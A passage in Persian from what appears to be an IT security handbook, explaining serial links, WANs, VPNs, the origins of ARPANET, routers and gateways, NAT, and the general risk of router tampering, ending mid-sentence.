‫ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻥ ﺩﻭ ﺭﺍﻳﺎﻧﻪ ﺭﺍ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﻳﻚ ﺧﻂ ﻣﺴﺘﻘﻴﻢ )ﺳﺮﻳﺎﻝ( ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﻣﺘﺼﻞ ﻛﺮﺩ‪ .‬ﺩﺭ ﺍﻳﻨﺼﻮﺭﺕ ﺑﺴﺘﻪﻫﺎﻱ ‪ IP‬ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ‬
‫ﭘﺮﻭﺗﻜﻞ ﻧﻘﻄﻪ‪-‬ﺑﻪ‪-‬ﻧﻘﻄﻪ )‪ ،(PPP‬ﭘﺮﻭﺗﻜﻞ ﺍﻳﻨﺘﺮﻧﺘﻲ ﺧﻄﻮﻁ ﺳﺮﻳﺎﻝ )‪ ،(SLIP‬ﻭ ﻳﺎ ‪ SLIP‬ﻓﺸﺮﺩﻩ )‪ (CSLTP‬ﺍﺭﺳﺎﻝ ﺷﻮﻧﺪ‪ .‬ﭼﻨﺎﻧﭽﻪ ﻫﺮ‬
‫ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻳﻚ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﻣﺘﺼﻞ ﺑﺎﺷﺪ‪ ،‬ﺍﻳﻦ ﺧﻂ ﺳﺮﻳﺎﻝ ﻣﻲﺗﻮﺍﻧﺪ ﻣﺜﻞ ﻳﻚ ﭘﻞ‪ ،‬ﺍﺭﺗﺒﺎﻁ ﻣﻴﺎﻥ ﺩﻭ ﺁﻥ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺭﺍ ﺍﻳﺠﺎﺩ ﻛﻨﺪ‪.‬‬

‫ﺷﺒﻜﻪﻫﺎﻱ ﮔﺴﺘﺮﺩﻩ )‪WAN‬ﻫﺎ(‬


‫ﺷﺒﻜﻪﻫﺎﻱ ﮔﺴﺘﺮﺩﻩ ﺷﺒﻜﻪﻫﺎﻳﻲ ﺑﺎ ﺳﺮﻋﺖ ﭘﺎﻳﻴﻨﺘﺮ ﻫﺴﺘﻨﺪ ﻛﻪ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺑﺮﺍﻱ ﻣﺘﺼﻞ ﻛﺮﺩﻥ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲﺷﺎﻥ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﺍﺯ ﺁﻧﻬﺎ‬
‫ﻻ ﺍﺯ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﻣﺴﺘﻘﻴﻢ ﺍﺳﺘﻴﺠﺎﺭﻱ )ﺍﻧﺤﺼﺎﺭﻱ( ﻭ ﻣﺪﺍﺭﻫﺎﻱ ﺩﺍﺩﻩﺍﻱ ﺑﺎ ﻣﺴﺎﻓﺖ ﻃﻮﻻﻧﻲ )ﻛﻪ‬ ‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ‪ .‬ﺷﺒﻜﻪﻫﺎﻱ ﮔﺴﺘﺮﺩﻩ ﻣﻌﻤﻮ ﹰ‬
‫ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺗﺼﺎﻻﺕ ﻣﺎﻫﻮﺍﺭﻩﺍﻱ‪ ،‬ﺍﺭﺗﺒﺎﻃﺎﺕ ﻣﺎﻳﻜﺮﻭﻭﻳﻮ‪ ،‬ﻭ ﻳﺎ ﻛﺎﺑﻠﻬﺎﻱ ﻓﻴﺒﺮﻧﻮﺭﻱ ﺭﺍ ﺍﺯ ﺧﻮﺩ ﻋﺒﻮﺭ ﺩﻫﻨﺪ( ﺳﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ ﻭ ﻗﺎﺩﺭﻧﺪ ﺩﺍﺩﻩ ﺭﺍ ﺑﺎ ﺳﺮﻋﺘﻲ ﻣﻴﺎﻥ‬
‫‪ ٥٦‬ﻫﺰﺍﺭ ﺑﻴﺖ ﺩﺭ ﺛﺎﻧﻴﻪ ﺗﺎ ﭼﻨﺪ ﻣﻴﻠﻴﻮﻥ ﺑﻴﺖ ﺩﺭ ﺛﺎﻧﻴﻪ ﻣﻨﺘﻘﻞ ﻧﻤﺎﻳﻨﺪ‪ .‬ﻳﻚ ﺷﺒﻜﺔ ﮔﺴﺘﺮﺩﻩ ﻣﻲﺗﻮﺍﻧﺪ ﺩﻓﺎﺗﺮ ﻳﻚ ﺷﺮﻛﺖ ﺭﺍ ﺩﺭ ﺳﺮﺍﺳﺮ ﻳﻚ‬
‫ﺷﻬﺮ ﻳﺎ ﻳﻚ ﻗﺎﺭﻩ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﺳﺎﺯﺩ‪ .‬ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻥ ﻳﻚ ﺷﺒﻜﺔ ﮔﺴﺘﺮﺩﻩ ﺭﺍ ﻣﻴﺎﻥ ﭼﻨﺪ ﺳﺎﺯﻣﺎﻥ ﺑﻪ ﺍﺷﺘﺮﺍﻙ ﮔﺬﺍﺷﺖ ﺗﺎ ﻫﻤﮕﻲ ﺍﺯ ﺁﻥ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻨﺪ‪.‬‬
‫ﺑﺨﺶ ﭘﻨﺠﻢ‬

‫ﻳﻚ ﻧﻮﻉ ﺧﺎﺹ ﺷﺒﻜﻪﻫﺎﻱ ﮔﺴﺘﺮﺩﻩ ﻛﻪ ﺍﺳﺘﻔﺎﺩﺓ ﻓﺰﺍﻳﻨﺪﻩﺍﻱ ﭘﻴﺪﺍ ﻛﺮﺩﻩ‪ ،‬ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )‪ (VPN‬ﺍﺳﺖ‪ VPN .‬ﻳﻚ ﺷﺒﻜﺔ‬
‫ﻣﺠﺎﺯﻱ ﺍﺳﺖ‪ ،‬ﭼﻮﻥ ﺑﺴﺘﻪﻫﺎ ﺍﺯ ﻃﺮﻳﻖ ﺍﻳﻨﺘﺮﻧﺖ )ﻳﺎ ﺷﺒﻜﻪ ﻋﻤﻮﻣﻲ ﺩﻳﮕﺮﻱ( ﻣﻨﺘﻘﻞ ﻣﻲﺷﻮﻧﺪ؛ ﻭ ﻧﻴﺰ ﻳﻚ ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ ﺍﺳﺖ‪ ،‬ﭼﺮﺍﻛﻪ ﺑﺮﺍﻱ‬
‫ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﻣﻄﻠﻊﺷﺪﻥ ﺳﺎﻳﺮ ﻛﺎﺭﺑﺮﺍﻥ ﺷﺒﻜﺔ ﻋﻤﻮﻣﻲ ﺍﺯ ﻣﺤﺘﻮﻳﺎﺕ ﺑﺴﺘﻪﻫﺎ ﻭ ﻳﺎ ﺩﺳﺘﻜﺎﺭﻱ ﺁﻥ ﻣﺤﺘﻮﻳﺎﺕ ﺗﻮﺳﻂ ﺁﻧﺎﻥ‪ ،‬ﺩﺍﺩﻩﻫﺎﻱ ﺩﺭﻭﻥ‬
‫ﺑﺴﺘﻪﻫﺎ ﺭﻣﺰﮔﺬﺍﺭﻱ ﻣﻲﺷﻮﺩ‪ VPN .‬ﻣﻲﺗﻮﺍﻧﺪ ﺑﺎ ﻫﺰﻳﻨﻪﺍﻱ ﺑﺴﻴﺎﺭ ﭘﺎﻳﻴﻨﺘﺮ ﺍﺯ ﺧﻄﻮﻁ ﺗﻠﻔﻦ ﺍﺳﺘﻴﺠﺎﺭﻱ‪ ،‬ﻣﻨﺎﻃﻖ ﻣﺨﺘﻠﻔﻲ ﺭﺍ ﺑﻪ ﻫﻢ ﻣﺘﺼﻞ ﻛﻨﺪ‪.‬‬
‫ﻳﻜﻲ ﺍﺯ ﺍﻭﻟﻴﻦ ﺷﺒﻜﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ‪ ARPANET‬ﺑﻮﺩ ﻛﻪ ﺩﺭ ﺍﻭﺍﻳﻞ ﺩﻫﺔ ‪ ١٩٧٠‬ﺗﻮﺳﻂ ﺩﺍﻧﺸﮕﺎﻫﻬﺎ ﻭ ﺷﺮﻛﺘﻬﺎﻱ ﻃﺮﻑ ﻗﺮﺍﺭﺩﺍﺩ ﺳﺎﺯﻣﺎﻥ‬
‫ﭘﺮﻭﮊﻩﻫﺎﻱ ﺗﺤﻘﻴﻘﺎﺗﻲ ﭘﻴﺸﺮﻓﺘﻪ ﻭﺯﺍﺭﺕ ﺩﻓﺎﻉ ﺍﻳﺎﻻﺕ ﻣﺘﺤﺪﻩ )‪ ARPA‬ﻳﺎ ‪ (DARPA‬ﺑﻮﺟﻮﺩ ﺁﻣﺪ‪ ARPANET .‬ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ‬
‫ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﻣﺘﺼﻞ ﺳﺎﺧﺖ ﻭ ﺑﻌﻨﻮﺍﻥ ﻳﻚ ﺷﺎﻫﺮﺍﻩ‪ ٢٥٠‬ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻭ ﺩﺍﻧﺸﮕﺎﻫﻲ ﺩﻳﮕﺮ ﻛﻪ ﺩﺭ ﺩﻫﺔ ‪ ١٩٨٠‬ﺑﻮﺟﻮﺩ ﺁﻣﺪﻧﺪ‬
‫ﺑﻜﺎﺭ ﺭﻓﺖ‪.‬‬

‫‪249 Broadcast‬‬
‫‪250 Backbone‬‬
‫ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬ ‫‪٣٨٨‬‬

‫ﺍﻣﺮﻭﺯ ﻧﻮﺍﺩﺓ ‪ ARPANET‬ﺗﺤﺖ ﻋﻨﻮﺍﻥ ﺍﻳﻨﺘﺮﻧﺖ ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﺩ‪ .‬ﺍﻳﻨﺘﺮﻧﺖ ﻳﻚ ﺷﺒﻜﺔ ﻣﺒﺘﻨﻲ ﺑﺮ ‪ IP‬ﺍﺳﺖ ﻛﻪ ﺻﺪﻫﺎ ﻣﻴﻠﻴﻮﻥ ﺭﺍﻳﺎﻧﻪ ﻭ‬
‫ﺑﻴﺶ ﺍﺯ ﻳﻚ ﻣﻴﻠﻴﺎﺭﺩ ﻛﺎﺭﺑﺮ ﺩﺭ ﺳﺮﺍﺳﺮ ﺟﻬﺎﻥ ﺭﺍ ﺩﺭ ﺑﺮ ﻣﻲﮔﻴﺮﺩ‪ .‬ﺑﺮﺧﻲ ﺍﺯ ﺍﻳﻦ ﺳﻴﺴﺘﻤﻬﺎﻱ ﻛﺎﻣﭙﻴﻮﺗﺮﻱ ﻫﻤﻮﺍﺭﻩ ﺑﻪ ﺍﻳﻦ ﺷﺒﻜﻪ ﻣﺘﺼﻞ ﻫﺴﺘﻨﺪ‬
‫ﻭ ﻣﺎﺑﻘﻲ ﻫﺮ ﺍﺯ ﭼﻨﺪﮔﺎﻩ ﺑﻪ ﺁﻥ ﻣﺘﺼﻞ ﻣﻲﺷﻮﻧﺪ‪ .‬ﻫﺮ ﻳﻚ ﺍﺯ ﻛﺎﺭﺑﺮﺍﻥ ﻣﻲﺗﻮﺍﻧﺪ ﺗﻼﺵ ﻛﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺷﻤﺎ ﻳﻚ ﻧﺎﻣﺔ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﺑﻔﺮﺳﺘﺪ‪ ،‬ﺑﺎ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﺓ ‪ FTP‬ﺷﻤﺎ ﭼﻨﺪ ﻓﺎﻳﻞ ﻣﺒﺎﺩﻟﻪ ﻛﻨﺪ‪ ،‬ﻭ ﻳﺎ )ﺩﺭﺻﻮﺭﺗﻴﻜﻪ ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻃﻮﺭﻱ ﭘﻴﻜﺮﺑﻨﺪﻱ ﺷﺪﻩ ﺑﺎﺷﺪ ﻛﻪ ﺑﻪ ﺁﻧﺎﻥ ﺩﺳﺘﺮﺳﻲ ﻻﺯﻡ ﺭﺍ ﺑﺪﻫﺪ( ﺑﻪ‬
‫ﺳﻴﺴﺘﻢ ﺷﻤﺎ ﻧﻔﻮﺫ ﻛﻨﺪ‪.‬‬

‫ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﻭ ﺩﺭﻭﺍﺯﻩﻫﺎ‬
‫ﻋﻠﻴﺮﻏﻢ ﭘﻴﭽﻴﺪﮔﻲ ﺍﻳﻨﺘﺮﻧﺖ ﻭ ﺁﺩﺭﺱﺩﻫﻲ ﺑﺮ ﻣﺒﻨﺎﻱ ‪ ،IP‬ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺍﺯ ﻃﺮﻳﻖ ﺷﺒﻜﺔ ﺟﻬﺎﻧﻲ ﺑﻪ ﻳﻜﺪﻳﮕﺮ ﭘﻴﺎﻡ ﺑﻔﺮﺳﺘﻨﺪ‪.‬‬
‫ﺑﺮﺍﻱ ﻓﺮﺳﺘﺎﺩﻥ ﻳﻚ ﺑﺴﺘﻪ‪ ،‬ﺍﻛﺜﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺗﻨﻬﺎ ﻣﻘﺼﺪ ﻧﻬﺎﻳﻲ ﺑﺴﺘﻪ ﺭﺍ ﺗﻌﻴﻴﻦ ﻛﺮﺩﻩ ﻭ ﺳﭙﺲ ﺑﺴﺘﻪ ﺭﺍ ﺑﻪ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﻧﺎﻡ "ﺩﺭﻭﺍﺯﻩ" ﺩﺭ ﺷﺒﻜﺔ‬
‫ﻣﺤﻠﻲ ﺧﻮﺩ ﻣﻲﻓﺮﺳﺘﻨﺪ‪ .‬ﺍﮔﺮ ﺍﻳﻦ ﺩﺭﻭﺍﺯﻩ ﺧﻮﺩ ﺗﻌﻴﻴﻦﻛﻨﻨﺪﺓ ﻣﻘﺼﺪ ﺑﻌﺪﻱ ﺑﺴﺘﻪ ﺩﺭ ﻣﺴﻴﺮ ﺍﺭﺳﺎﻝ ﺁﻥ ﺑﻪ ﻣﻘﺼﺪ ﻧﻬﺎﻳﻲ ﺑﺎﺷﺪ‪ ،‬ﺑﻪ ﺁﻥ‬
‫"ﻣﺴﻴﺮﻳﺎﺏ" ﻣﻲﮔﻮﻳﻨﺪ‪ .‬ﻣﺴﻴﺮﻳﺎﺏ ﺑﺮﺍﻱ ﺭﺳﺎﻧﺪﻥ ﺑﺴﺘﻪ ﺑﻪ ﻣﻘﺼﺪ ﻧﻬﺎﻳﻲ‪ ،‬ﺁﻧﺮﺍ ﺑﻪ ﻳﻚ ﺩﺭﻭﺍﺯﻩ ﻛﻪ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺑﻪ ﺁﻥ ﻣﺘﺼﻞ ﺍﺳﺖ ﻭ ﮔﻤﺎﻥ‬
‫ﻣﻲﺷﻮﺩ ﻛﻪ ﻳﻚ ﻗﺪﻡ ﻧﺰﺩﻳﻜﺘﺮ ﺑﻪ ﻣﻘﺼﺪ ﻧﻬﺎﻳﻲ ﺑﺎﺷﺪ ﻣﻲﻓﺮﺳﺘﺪ‪.‬‬
‫ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﻳﻚ ﺩﺭﺧﺖ ﺑﺰﺭﮒ ﭘﻴﻜﺮﺑﻨﺪﻱ ﻣﻲﻛﻨﻨﺪ ﻛﻪ ﺩﺭ ﺭﻳﺸﺔ ﺁﻥ‪ ،‬ﺍﺭﺗﺒﺎﻁ ﺳﺎﺯﻣﺎﻥ ﺑﺎ ﺍﻳﻨﺘﺮﻧﺖ‬
‫ﻗﺮﺍﺭ ﺩﺍﺭﺩ‪ .‬ﻫﻨﮕﺎﻣﻴﻜﻪ ﺩﺭﻭﺍﺯﻩ ﻳﻚ ﺑﺴﺘﻪ ﺭﺍ ﺩﺭﻳﺎﻓﺖ ﻣﻲﻛﻨﺪ‪ ،‬ﺗﺼﻤﻴﻢ ﻣﻲﮔﻴﺮﺩ ﻛﻪ ﺁﻧﺮﺍ ﺑﻪ ﻳﻜﻲ ﺍﺯ ﺯﻳﺮﺷﺒﻜﻪﻫﺎﻱ ﺧﻮﺩ ﺑﻔﺮﺳﺘﺪ ﻭ ﻳﺎ ﺑﻪ ﺳﻮﻱ‬
‫ﺭﻳﺸﻪ ﻫﺪﺍﻳﺖ ﻛﻨﺪ‪ .‬ﺩﺭ ﺑﻴﺮﻭﻥ‪ ،‬ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ‪ ،‬ﺍﺭﺍﺋﻪﻛﻨﻨﺪﮔﺎﻥ ﺍﺻﻠﻲ ‪ IP‬ﺷﺒﻜﻪﺍﻱ ﭘﻴﭽﻴﺪﻩ‪ ،‬ﺍﻟﮕﻮﺭﻳﺘﻤﻬﺎﻱ ﻣﺴﻴﺮﻳﺎﺑﻲ ﭘﻴﺸﺮﻓﺘﻪ‪ ،‬ﻭ ﭘﺮﻭﺗﻜﻠﻬﺎﻱ‬
‫ﻣﺴﻴﺮﻳﺎﺑﻲ ﻣﺨﺼﻮﺹ ﺩﺍﺭﻧﺪ ﻭ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬﺎ ﺍﺯ ﺷﺒﻜﻪﻫﺎﻱ ﻫﻤﭙﻮﺷﺎﻥ ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﻛﻨﻨﺪ ﺗﺎ ﺍﮔﺮ ﻳﻚ ﺍﺗﺼﺎﻝ ﺍﺯ ﻛﺎﺭ ﺍﻓﺘﺎﺩ‪ ،‬ﺳﺎﻳﺮ ﺍﺗﺼﺎﻻﺕ‬
‫ﻫﻤﭽﻨﺎﻥ ﺍﺭﺗﺒﺎﻁ ﺭﺍ ﺑﺮﻗﺮﺍﺭ ﻧﮕﻬﺪﺍﺭﻧﺪ‪.‬‬
‫ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﻧﮕﻲ ﻭ ﺍﺩﺍﺭﺍﺕ ﻛﻮﭼﻚ ﺑﻪ ﺁﺳﺎﻧﻲ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ‪ ٤‬ﻳﺎ ‪ ٨‬ﭘﻮﺭﺗﻲ ‪ Ethernet‬ﺗﻬﻴﻪ ﻛﻨﻨﺪ ﻛﻪ ﺑﺮﺍﻱ ﺍﺗﺼﺎﻝ ﺑﻪ ﻳﻚ ‪DSL‬‬
‫ﺑﺎ ﭘﻬﻨﺎﻱ ﺑﺎﻧﺪ ﺯﻳﺎﺩ ﻭ ﻳﺎ ﻣﻮﺩﻣﻬﺎﻱ ﻛﺎﺑﻠﻲ ﻃﺮﺍﺣﻲ ﺷﺪﻩﺍﻧﺪ ﻭ ﺑﺴﺘﻪﻫﺎ ﺭﺍ ﻣﻴﺎﻥ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﺎﻧﮕﻲ ﻭ ﺁﻥ ﺍﺗﺼﺎﻝ ﭘﺮﺳﺮﻋﺖ ﻭ ﺍﺯ ﺁﻧﺠﺎ ﺑﻪ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻫﺪﺍﻳﺖ ﻣﻲﻛﻨﻨﺪ‪ .‬ﻳﻜﻲ ﺍﺯ ﻣﻬﻤﺘﺮﻳﻦ ﻣﺸﺨﺼﻪﻫﺎﻱ ﺍﻳﻦ ﺩﺳﺘﮕﺎﻫﻬﺎ )ﻭ ﻧﻴﺰ ﺩﺳﺘﮕﺎﻫﻬﺎﻳﻲ ﻛﻪ ﺑﻮﺳﻴﻠﺔ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﺍﻧﺘﻬﺎﻳﻲ‪ ٢٥١‬ﭘﺸﺘﻴﺒﺎﻧﻲ‬
‫ﻣﻲﺷﻮﻧﺪ( ﻗﺎﺑﻠﻴﺖ ﺗﺮﺟﻤﺔ ﺁﺩﺭﺱ ﺷﺒﻜﻪ )‪ ٢٥٢(NAT‬ﺍﺳﺖ‪ NAT .‬ﻳﻚ ﺳﻴﺴﺘﻢ ﻋﻤﻮﻣﻲ ﺑﺮﺍﻱ ﺗﺮﺟﻤﺔ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺑﺴﺘﻪﻫﺎﻱ ﺩﺭﻳﺎﻓﺘ ﹺ‬
‫ﻲ‬
‫ﻣﺴﻴﺮﻳﺎﺏ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ ﺩﻳﮕﺮ‪ ،‬ﻗﺒﻞ )ﻳﺎ ﺑﻌﺪ( ﺍﺯ ﺗﻌﻴﻴﻦ ﻣﻘﺼﺪ ﺑﺴﺘﻪ ﺗﻮﺳﻂ ﻣﺴﻴﺮﻳﺎﺏ ﻭ ﺍﺭﺳﺎﻝ ﺁﻥ ﺑﻪ ﻣﻘﺼﺪ ﺍﺳﺖ ﻛﻪ ﻋﻤﻮﻣﹰﺎ ﺍﺯ ﺁﻥ ﺑﺮﺍﻱ ﺍﻳﻦ‬
‫ﺍﺳﺘﻔﺎﺩﻩ ﻣﻲﺷﻮﺩ ﻛﻪ ﺍﻣﻜﺎﻥ ﺍﺳﺘﻔﺎﺩﺓ ﭼﻨﺪﻳﻦ ﺭﺍﻳﺎﻧﺔ ﺩﺍﺧﻠﻲ ﺑﺎ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻣﺤﺮﻣﺎﻧﻪ )ﻭ ﻏﻴﺮﻗﺎﺑﻞ ﻣﺴﻴﺮﻳﺎﺑﻲ( ﺍﺯ ﻳﻚ ﺁﺩﺭﺱ ‪ IP‬ﺧﺎﺭﺟﻲ‬
‫)ﻋﻤﻮﻣﻲ( ﻭﺍﺣﺪ‪ ،‬ﻭ ﻳﺎ ﺑﺮﺍﻱ ﺗﺮﺟﻤﺔ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﻋﻤﻮﻣﻲ ﮔﺮﻭﻫﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﻪ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺧﺼﻮﺻﻲ ﻣﺘﻨﺎﻇﺮ ﺩﺭ ﺷﺒﻜﺔ ﺩﺍﺧﻠﻲ ﺑﻜﺎﺭ‬
‫ﻣﻲﺭﻭﺩ‪ .‬ﺍﺯ ﺁﻧﺠﺎﻛﻪ ﺁﺩﺭﺳﻬﺎﻱ ‪ IP‬ﺩﺍﺧﻠﻲ ﻣﺴﺘﻘﻴﻤﹰﺎ ﺍﺯ ﺭﻭﻱ ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺑﻞ ﺩﺳﺘﺮﺱ ﻧﻴﺴﺘﻨﺪ )ﭼﺮﺍﻛﻪ ﻫﻴﭻ ﻣﺴﻴﺮﻳﺎﺏ ﺩﻳﮕﺮﻱ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺁﻧﺮﺍ ﺑﺪﺭﺳﺘﻲ‬
‫ﻫﺪﺍﻳﺖ ﻛﻨﺪ(‪ NAT ،‬ﻣﻲﺗﻮﺍﻧﺪ ﺩﺭ ﻣﻘﺎﺑﻞ ﺍﺗﺼﺎﻻﺗﻲ ﻛﻪ ﺗﻮﺳﻂ ﻛﺎﺭﺑﺮﺍﻥ ﺧﺎﺭﺟﻲ ﺭﻭﻱ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﺍﺧﻠﻲ ﺍﻳﺠﺎﺩ ﻣﻲﺷﻮﺩ ﻧﻮﻋﻲ ﺣﻔﺎﻇﺖ ﺍﻳﺠﺎﺩ‬
‫ﻛﻨﺪ‪ ،‬ﻫﺮﭼﻨﺪ ﻣﺎﺷﻴﻨﻬﺎﻱ ﺩﺍﺧﻠﻲ ﻫﻤﭽﻨﺎﻥ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﻣﺘﺼﻞ ﺑﺎﺷﻨﺪ‪.‬‬
‫ﻣﺸﺨﺼﺔ ﺑﻌﺪﻱ ﻣﺴﻴﺮﻳﺎﺑﻬﺎﻱ ﺍﻧﺘﻬﺎﻳﻲ‪ ،‬ﺗﻮﺍﻧﺎﻳﻲ ﺁﻧﻬﺎ ﺩﺭ ﺭﺍﻩﺍﻧﺪﺍﺯﻱ ﺷﺒﻜﺔ ﺧﺼﻮﺻﻲ ﻣﺠﺎﺯﻱ )‪ (VPN‬ﻣﻴﺎﻥ ﺩﻭ ﺷﺒﻜﺔ ﻣﺤﻠﻲ ﺩﺭ ﻣﻜﺎﻧﻬﺎﻱ‬
‫ﻼ ﺩﻭ ﺩﻓﺘﺮ ﻳﻚ ﺳﺎﺯﻣﺎﻥ ‪ -‬ﺍﺳﺖ‪ .‬ﻳﻚ ﺟﻔﺖ ﻣﺴﻴﺮﻳﺎﺏ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭘﺮﻭﺗﻜﻠﻬﺎﻳﻲ ﻣﺎﻧﻨﺪ ‪ IPsec‬ﻭ ﺍﻧﺘﻘﺎﻝ ﺍﻣﻦ‬‫ﺟﺪﺍﮔﺎﻧﻪ ‪ -‬ﻣﺜ ﹰ‬
‫ﺑﺴﺘﻪﻫﺎ ﻣﻴﺎﻥ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﺑﺎ ﺍﺳﺘﻔﺎﺩﻩ ﺍﺯ ﭼﻴﺰﻱ ﺷﺒﻴﻪ ﻳﻚ ﺗﻮﻧﻞ ﻣﺠﺎﺯﻱ ﻭ ﻧﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺣﻔﺎﻇﺖﻧﺸﺪﻩ‪ VPN ،‬ﺭﺍ ﺑﻮﺟﻮﺩ ﺁﻭﺭﻧﺪ‪.‬‬
‫ﻻ ﻣﺮﺯﻫﺎﻱ ﻣﺤﺪﻭﺩﺓ ﺍﻣﻨﻴﺘﻲ ﻳﻚ ﺷﺒﻜﻪ ﺭﺍ ﻧﺸﺎﻥ ﻣﻲﺩﻫﻨﺪ ﻭ ﻣﻲﺗﻮﺍﻧﻨﺪ ﻳﻚ ﻧﻘﻄﺔ ﺁﺳﻴﺐﭘﺬﻳﺮﻱ ﻣﺤﺴﻮﺏ ﺷﻮﻧﺪ‪ .‬ﻣﻬﺎﺟﻤﺎﻥ‬ ‫ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﻣﻌﻤﻮ ﹰ‬
‫ﺑﺎ ﺩﺳﺘﻜﺎﺭﻱ ﻳﻚ ﻣﺴﻴﺮﻳﺎﺏ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺑﺴﺘﻪﻫﺎﻳﻲ ﻛﻪ ﺑﻪ ﻣﻘﺼﺪ ﺳﺎﺯﻣﺎﻥ ﺍﺭﺳﺎﻝ ﺷﺪﻩﺍﻧﺪ ﺭﺍ ﺑﻪ ﺟﺎﻱ ﺩﻳﮕﺮﻱ ﻫﺪﺍﻳﺖ ﻛﻨﻨﺪ‪ ،‬ﻳﺎ ﺑﻪ ﻣﻴﺰﺑﺎﻧﻬﺎﻱ‬
‫ﺩﺍﺧﻠﻲ ﻳﺎ ﺍﻃﻼﻋﺎﺕ ﭼﻴﻨﺶ ﺷﺒﻜﻪ‪ ٢٥٣‬ﺩﺳﺘﺮﺳﻲ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻴﺎﺑﻨﺪ‪ .‬ﻫﺮ ﺗﻮﻟﻴﺪﻛﻨﻨﺪﺓ ﻣﺴﻴﺮﻳﺎﺏ‪ ،‬ﻭﻳﮋﮔﻴﻬﺎﻱ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱ ﻣﺘﻔﺎﻭﺗﻲ ﺍﺭﺍﺋﻪ ﻣﻲﺩﻫﺪ‬
‫ﻛﻪ ﺑﺎﻋﺚ ﻣﻲﺷﻮﺩ ﺍﻣﻦ ﻛﺮﺩﻥ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﻛﺎﺭ ﺩﺷﻮﺍﺭﻱ ﺷﻮﺩ‪ .‬ﻳﻚ ﭘﻴﺸﻨﻬﺎﺩ ﻋﻤﻠﻲ ﺍﻳﻦ ﺍﺳﺖ ﻣﻄﻤﺌﻦ ﺷﻮﻳﻢ ﻣﺴﻴﺮﻳﺎﺑﻬﺎ ﺗﻨﻬﺎ ﺑﺎ ﺩﺳﺘﺮﺳﻲ‬
